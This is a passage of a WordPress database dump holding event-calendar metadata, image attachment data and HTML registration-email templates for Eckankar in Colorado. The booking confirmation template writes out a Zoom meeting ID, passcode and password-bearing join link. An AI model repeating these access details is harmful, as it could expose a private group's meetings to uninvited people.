/>\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(186767,268743,'mec_event_status','EventScheduled'),(186768,268743,'mec_moved_online_link',''),(186769,268743,'mec_cancelled_reason',''),(186770,268743,'mec_display_cancellation_reason_in_single_page',''),(186771,268743,'protect_children',''),(186772,268743,'passster_activate_global_protection',NULL),(186773,268743,'passster_activate_protection',NULL),(186774,268743,'passster_protection_type','password'),(186775,268743,'boldgrid_hide_page_title','0'),(186776,268743,'_thumbnail_id','268744'),(186790,268743,'_dp_original','266311'),(186778,268743,'boldgrid_in_page_containers','1'),(186779,268743,'passster_area_shortcode',''),(186780,268743,'mec_cost_auto_calculate','0'),(186781,268743,'mec_style_per_event','global'),(186782,268743,'mec_trailer_url',''),(186783,268743,'mec_trailer_title',''),(186784,268743,'mec_start_datetime','2023-07-23 10:30 AM'),(186785,268743,'mec_end_datetime','2023-07-23 11:30 AM'),(186786,268743,'mec_sequence','6'),(186787,268743,'mec_event_gallery','a:0:{}'),(186788,268743,'mec_related_events','a:0:{}'),(186789,268743,'mec_banner','a:0:{}'),(186791,268743,'_edit_lock','1689024170:2'),(186792,268743,'_edit_last','2'),(186793,268744,'_wp_attached_file','2023/06/flowers-on-swing.jpg'),(186794,268744,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:796;s:6:\"height\";i:448;s:4:\"file\";s:28:\"2023/06/flowers-on-swing.jpg\";s:8:\"filesize\";i:72006;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:28:\"flowers-on-swing-348x196.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17540;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:28:\"flowers-on-swing-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6921;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:28:\"flowers-on-swing-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:58099;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:28:\"flowers-on-swing-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19705;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:28:\"flowers-on-swing-500x448.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:448;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41347;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:28:\"flowers-on-swing-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:31364;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:28:\"flowers-on-swing-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22944;}s:8:\"tileview\";a:5:{s:4:\"file\";s:28:\"flowers-on-swing-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:23337;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(186795,268744,'original-file','2023/06/flowers-on-swing-updraft-pre-smush-original.jpg'),(186796,268744,'smush-complete','1'),(186797,268744,'smush-info','The file was compressed from 70.32 KB to 69.32 KB saving 1.43 percent using WP-Optimize'),(186798,268744,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:72006;s:12:\"smushed-size\";i:70979;s:15:\"savings-percent\";d:1.4299999999999999378275106209912337362766265869140625;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:72006;s:10:\"compressed\";i:70979;}s:6:\"medium\";a:2:{s:8:\"original\";i:17540;s:10:\"compressed\";i:17540;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6921;s:10:\"compressed\";i:6855;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:58099;s:10:\"compressed\";i:58099;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:19705;s:10:\"compressed\";i:19705;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:41347;s:10:\"compressed\";i:41347;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:31364;s:10:\"compressed\";i:31364;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:22944;s:10:\"compressed\";i:22944;}s:8:\"tileview\";a:2:{s:8:\"original\";i:23337;s:10:\"compressed\";i:23337;}}}'),(186799,268745,'mec_color',''),(186800,268745,'mec_location_id','118'),(186801,268745,'mec_dont_show_map','0'),(186802,268745,'mec_organizer_id','1'),(186803,268745,'mec_read_more',''),(186804,268745,'mec_more_info',''),(186805,268745,'mec_more_info_title',''),(186806,268745,'mec_more_info_target','_self'),(186807,268745,'mec_cost',''),(186808,268745,'mec_currency','a:0:{}'),(186809,268745,'mec_additional_organizer_ids','a:0:{}'),(186810,268745,'mec_additional_location_ids','a:0:{}'),(186811,268745,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-07-31\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-07-31\";s:4:\"hour\";s:1:\"8\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(186812,268745,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(186813,268745,'mec_certain_weekdays','a:0:{}'),(186814,268745,'mec_allday','0'),(186815,268745,'one_occurrence','0'),(186816,268745,'mec_hide_time','0'),(186817,268745,'mec_hide_end_time','0'),(186818,268745,'mec_comment',''),(186819,268745,'mec_timezone','global'),(186820,268745,'mec_countdown_method','global'),(186821,268745,'mec_public','1'),(186822,268745,'mec_start_date','2023-07-31'),(186823,268745,'mec_start_time_hour','7'),(186824,268745,'mec_start_time_minutes','0'),(186825,268745,'mec_start_time_ampm','PM'),(186826,268745,'mec_start_day_seconds','68400'),(186827,268745,'mec_end_date','2023-07-31'),(186828,268745,'mec_end_time_hour','8'),(186829,268745,'mec_end_time_minutes','0'),(186830,268745,'mec_end_time_ampm','PM'),(186831,268745,'mec_end_day_seconds','72000'),(186832,268745,'mec_repeat_status','0'),(186833,268745,'mec_repeat_type',''),(186834,268745,'mec_repeat_interval','1'),(186835,268745,'mec_repeat_end',''),(186836,268745,'mec_repeat_end_at_occurrences',''),(186837,268745,'mec_repeat_end_at_date',''),(186838,268745,'mec_advanced_days','a:0:{}'),(186839,268745,'mec_in_days',''),(186840,268745,'mec_not_in_days',''),(186841,268745,'mec_hourly_schedules','a:0:{}'),(186842,268745,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(186843,268745,'mec_tickets','a:0:{}'),(186844,268745,'mec_fees_global_inheritance','1'),(186845,268745,'mec_fees','a:0:{}'),(186846,268745,'mec_ticket_variations_global_inheritance','1'),(186847,268745,'mec_ticket_variations','a:0:{}'),(186848,268745,'mec_reg_fields_global_inheritance','1'),(186849,268745,'mec_reg_fields','a:0:{}'),(186850,268745,'mec_bfixed_fields','a:0:{}'),(186851,268745,'mec_op','a:0:{}'),(186852,268745,'mec_fields','a:0:{}'),(186853,268745,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:27:\"Eckankar Event Registration\";s:7:\"content\";s:6107:\"<p>\r\n<style>\r\n    table, td, div, h1, p \r\n      font-family: Arial, sans-serif;\r\n    }\r\n    @media screen and (max-width: 530px) {<br />\r\n      .unsub {<br />\r\n        display: block;<br />\r\n        padding: 8px;<br />\r\n        margin-top: 14px;<br />\r\n        border-radius: 6px;<br />\r\n        background-color: #555555;<br />\r\n        text-decoration: none !important;<br />\r\n        font-weight: bold;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 100% !important;<br />\r\n      }<br />\r\n    }<br />\r\n    @media screen and (min-width: 531px) {<br />\r\n      .col-sml {<br />\r\n        max-width: 27% !important;<br />\r\n      }<br />\r\n      .col-lge {<br />\r\n        max-width: 73% !important;<br />\r\n      }<br />\r\n    }<br />\r\n  </style>\r\n</p>\r\n<p>&nbsp;</p>\r\n<div role=\"article\" aria-roledescription=\"email\" style=\"text-size-adjust: 100%; -webkit-text-size-adjust: 100%; -ms-text-size-adjust: 100%; background-color: #ffffff;\" lang=\"en\">\r\n<table style=\"width: 100%; border: none; border-spacing: 0;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0;\" align=\"center\"><!-- [if mso]></p>\r\n<table role=\"presentation\" align=\"center\" style=\"width:600px;\">\r\n<tr>\r\n<td>\r\n<p>          <![endif]-->\r\n<table style=\"width: 94%; max-width: 600px; border: none; border-spacing: 0; text-align: left; font-family: Arial,sans-serif; font-size: 16px; line-height: 22px; color: #363636;\" role=\"presentation\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 0px 10px 0px; background-color: #ffffff; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\"><img class=\"alignnone wp-image-266520 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2022/03/email-img-registration-597-bluframe-whitetext-9.png\" alt=\"\" width=\"604\" height=\"145\" /></td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px 20px 10px 20px; background-color: #f5f5f5; text-align: center; border-bottom: 1px solid #ccc; border-width: 70%; line-height: 50px;\">\r\n<p style=\"margin: 0;\"><span style=\"color: #1d5791; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>Event Registration Confirmation</strong></span></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px 10px 10px 10px; font-size: 0; background-color: #ffffff; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35);\"><!-- [if mso]></p>\r\n<table role=\"presentation\" width=\"100%\">\r\n<tr>\r\n<td style=\"width:145px; padding: 15px 10px 11px 10px;\" align=\"left\" valign=\"top\">\r\n<p>                <![endif]-->\r\n<div class=\"col-lge\" style=\"display: inline-block; width: 100%; max-width: 500px; vertical-align: top; padding-bottom: 20px; font-family: Arial,sans-serif; font-size: 18px; line-height: 22px; color: #363636;\">\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px;\"><b>Hello %%first_name%% and thank you for registering!</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 20px;\">You are signed up for the following online event:</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b><span style=\"color: #1d5791;\">Title: </span>%%event_title%%</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b style=\"color: #1d5791;\">Date: </b>%%event_start_date%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b style=\"color: #1d5791;\">Time: </b>%%event_start_time%%</p>\r\n<p style=\"margin-top: 0; margin-bottom: 15px;\"> </p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px; font-size: 22px; color: #1d5791;\"><b>Zoom Login Information:</b></p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\"><b>Meeting ID: </b> 923 1691 4318<br />\r\n<b>Passcode:</b> 938668</p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><a href=\"https://zoom.us/j/92316914318?pwd=VHFxMFJ3T3FhcSt6eUZlejZ6bXRaUT09\">https://zoom.us/j/92316914318?pwd=VHFxMFJ3T3FhcSt6eUZlejZ6bXRaUT09</a></p>\r\n<p style=\"margin-top: 0; margin-bottom: 20px;\"><b>Dial-in number: </b>720-707-2699 (for those who need to join by phone)</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. Please note that Zoom works best if you download the app. It is more stable and has more functions. Select use computer audio for sound.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</p>\r\n<p style=\"margin-top: 0; margin-bottom: 12px;\">See you there!</p>\r\n</div>\r\n<p><!-- [if mso]>\r\n                </td>\r\n</tr>\r\n</table>\r\n<p>                <![endif]--></p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 20px; font-size: 16px; line-height: 28px; background-color: #efefef; border-bottom: 1px solid #f0f0f5; border-color: rgba(201,201,207,.35); text-align: center;\">You are receiving this email because you have submitted a request through the <a href=\"https://eckankar-colorado.org/\">Eckankar in Colorado</a> website. If you have any questions regarding the origin of this email, please feel free to get in touch, we\'re always happy to help out.</td>\r\n</tr>\r\n<tr>\r\n<td style=\"padding: 10px; background-color: #6e6e6e;\">\r\n<figure style=\"text-align: center;\"><span style=\"font-family: arial, helvetica, sans-serif;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </span></figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px; font-family: arial, helvetica, sans-serif;\">© Eckankar In Colorado -2022</span><br />\r\n<span style=\"font-family: arial, helvetica, sans-serif;\"><a title=\"Contact Us\" href=\"mailto:webmaster@eckankar-colorado.org\"><span style=\"font-size: 14px; line-height: 20px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto; color: #cccccc; margin: 0px;\">Contact Us</span></a></span></figure>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p><!-- [if mso]>\r\n          </td>\r\n</tr>\r\n</table>\r\n<p>          <![endif]--></p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"1\";s:7:\"subject\";s:22:\"New Event Registration\";s:7:\"content\";s:10014:\"<!-- [if !mso]><!--><!--<![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n\r\n      <xml>\r\n        <o:OfficeDocumentSettings>\r\n          <o:AllowPNG/>\r\n          <o:PixelsPerInch>96</o:PixelsPerInch>\r\n        </o:OfficeDocumentSettings>\r\n      </xml>\r\n      <![endif]--><!-- [if (gte mso 9)|(IE)]>\r\n  \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<style type=\"text/css\">\r\n    body {width: 600px;margin: 0 auto;}\r\n    table {border-collapse: collapse;}\r\n    table, td {mso-table-lspace: 0pt;mso-table-rspace: 0pt;}\r\n    img {-ms-interpolation-mode: bicubic;}\r\n  </style>\r\n<![endif]-->\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p>\r\n<style type=\"text/css\">\r\n    body, p, div {\r\n      font-family: inherit;\r\n      font-size: 14px;\r\n    }\r\n    body {\r\n      color: #000000;\r\n    }\r\n    body a {\r\n      color: #1188E6;\r\n      text-decoration: none;\r\n    }\r\n    p { margin: 0; padding: 0; }\r\n    table.wrapper {\r\n      width:100% !important;\r\n      table-layout: fixed;\r\n      -webkit-font-smoothing: antialiased;\r\n      -webkit-text-size-adjust: 100%;\r\n      -moz-text-size-adjust: 100%;\r\n      -ms-text-size-adjust: 100%;\r\n    }\r\n    img.max-width {\r\n      max-width: 100% !important;\r\n    }\r\n    .column.of-2 {\r\n      width: 50%;\r\n    }\r\n    .column.of-3 {\r\n      width: 33.333%;\r\n    }\r\n    .column.of-4 {\r\n      width: 25%;\r\n    }\r\n    ul ul ul ul  {\r\n      list-style-type: disc !important;\r\n    }\r\n    ol ol {\r\n      list-style-type: lower-roman !important;\r\n    }\r\n    ol ol ol {\r\n      list-style-type: lower-latin !important;\r\n    }\r\n    ol ol ol ol {\r\n      list-style-type: decimal !important;\r\n    }\r\n    @media screen and (max-width:480px) {\r\n      .preheader .rightColumnContent,\r\n      .footer .rightColumnContent {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent div,\r\n      .preheader .rightColumnContent span,\r\n      .footer .rightColumnContent div,\r\n      .footer .rightColumnContent span {\r\n        text-align: left !important;\r\n      }\r\n      .preheader .rightColumnContent,\r\n      .preheader .leftColumnContent {\r\n        font-size: 80% !important;\r\n        padding: 5px 0;\r\n      }\r\n      table.wrapper-mobile {\r\n        width: 100% !important;\r\n        table-layout: fixed;\r\n      }\r\n      img.max-width {\r\n        height: auto !important;\r\n        max-width: 100% !important;\r\n      }\r\n      a.bulletproof-button {\r\n        display: block !important;\r\n        width: auto !important;\r\n        font-size: 80%;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n      }\r\n      .columns {\r\n        width: 100% !important;\r\n      }\r\n      .column {\r\n        display: block !important;\r\n        width: 100% !important;\r\n        padding-left: 0 !important;\r\n        padding-right: 0 !important;\r\n        margin-left: 0 !important;\r\n        margin-right: 0 !important;\r\n      }\r\n      .social-icon-column {\r\n        display: inline-block !important;\r\n      }\r\n    }\r\n  </style>\r\n</p>\r\n<p>\r\n<style>\r\nbody {font-family: \'Muli\', sans-serif;}\r\n</style>\r\n</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<!--user entered Head Start--><!--End Head user entered--><center class=\"wrapper\" data-link-color=\"#1188E6\" data-body-style=\"font-size:14px; font-family:inherit; color:#000000; background-color:#FFFFFF;\">\r\n<div class=\"webkit\">\r\n<table class=\"wrapper\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" bgcolor=\"#FFFFFF\">\r\n<tbody>\r\n<tr>\r\n<td valign=\"top\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"outer\" role=\"content-container\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td width=\"100%\">\r\n<table border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td><!-- [if mso]>\r\n    <center>\r\n    \r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n<table>\r\n<tr>\r\n<td width=\"600\">\r\n  <![endif]-->\r\n<table style=\"width: 100%; max-width: 600px;\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px 0px 0px 0px; color: #000000; text-align: left;\" role=\"modules-container\" align=\"left\" bgcolor=\"#FFFFFF\" width=\"100%\">\r\n<table class=\"module preheader preheader-hide\" style=\"display: none !important; mso-hide: all; visibility: hidden; opacity: 0; color: transparent; height: 0; width: 0;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"preheader\">\r\n<tbody>\r\n<tr>\r\n<td role=\"module-content\">\r\n<p>&nbsp;</p>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table style=\"padding: 30px 20px 30px 20px;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" align=\"center\" bgcolor=\"#f6f6f6\" data-type=\"columns\" data-distribution=\"1\">\r\n<tbody>\r\n<tr role=\"module-content\">\r\n<td valign=\"top\" height=\"100%\">\r\n<table class=\"column column-0\" style=\"width: 540px; border-spacing: 0; border-collapse: collapse; margin: 0px 10px 0px 10px;\" border=\"0\" width=\"540\" cellspacing=\"0\" cellpadding=\"0\" align=\"left\" bgcolor=\"\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 0px; margin: 0px; border-spacing: 0;\">\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"6c9e9414-eb30-47e2-97d8-7bd6a4df5990\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 10px 0px; line-height: 24px; text-align: inherit;\" role=\"module-content\" valign=\"top\" bgcolor=\"\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #1d5791; font-family: arial, helvetica, sans-serif; font-size: 36px; text-decoration-line: underline; text-decoration-style: solid; text-decoration-color: currentcolor; text-decoration-thickness: auto;\">Admin Notification</span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"948e3f3f-5214-4721-a90e-625a47b1c957\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 20px 30px 18px 30px; line-height: 26px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"color: #707172; font-size: 30px; font-family: arial, helvetica, sans-serif;\"><strong>New Event Registration</strong></span></div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a10dcb57-ad22-4f4d-b765-1d427dfddb4e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 30px 18px 30px; line-height: 22px; text-align: inherit; background-color: #ffffff;\" role=\"module-content\" valign=\"top\" bgcolor=\"#ffffff\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 20px; color: #333333;\"><strong>A new registration has been submitted for the following event:</strong></span></div>\r\n<p>&nbsp;</p>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>%%event_title%%</strong></span></div>\r\n<div></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Date: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_date%%</strong></span></div>\r\n<div style=\"font-family: inherit; text-align: inherit;\"><span style=\"font-size: 19px; color: #23507d;\"><strong>Time: </strong></span><span style=\"font-size: 19px; color: #333333;\"><strong>%%event_start_time%%</strong></span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a4e5faa9-7044-47fd-a4a1-b7a1746c258e\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 18px 0px 18px 5px; line-height: 22px; text-align: inherit; background-color: #efefef;\" role=\"module-content\" valign=\"top\" bgcolor=\"#efefef\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"><span style=\"font-size: 14pt;\">%%attendees_full_info%%</span> </div>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table class=\"module\" style=\"table-layout: fixed;\" role=\"module\" border=\"0\" width=\"100%\" cellspacing=\"0\" cellpadding=\"0\" data-type=\"text\" data-muid=\"a265ebb9-ab9c-43e8-9009-54d6151b1600\" data-mc-module-version=\"2019-10-22\">\r\n<tbody>\r\n<tr>\r\n<td style=\"padding: 8px 30px 40px 28px; line-height: 22px; text-align: inherit; background-color: #6e6e6e;\" role=\"module-content\" valign=\"top\" bgcolor=\"#6e6e6e\" height=\"100%\">\r\n<div>\r\n<div style=\"font-family: inherit; text-align: center;\"></div>\r\n<figure style=\"text-align: center;\"><img src=\"https://eckankar-colorado.org/wp-content/uploads/2021/05/fb-icon-email.png\" alt=\"f\" width=\"40\" height=\"40\" /> </figure>\r\n<figure style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 20px; color: #cccccc; margin: 0px;\">© Eckankar In Colorado -2022</span></figure>\r\n</div>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<!-- [if mso]>\r\n                                  </td>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                                </tr>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                              </table>\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n                            </center>\r\n                            <![endif]--></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n</div>\r\n</center>\";}}');
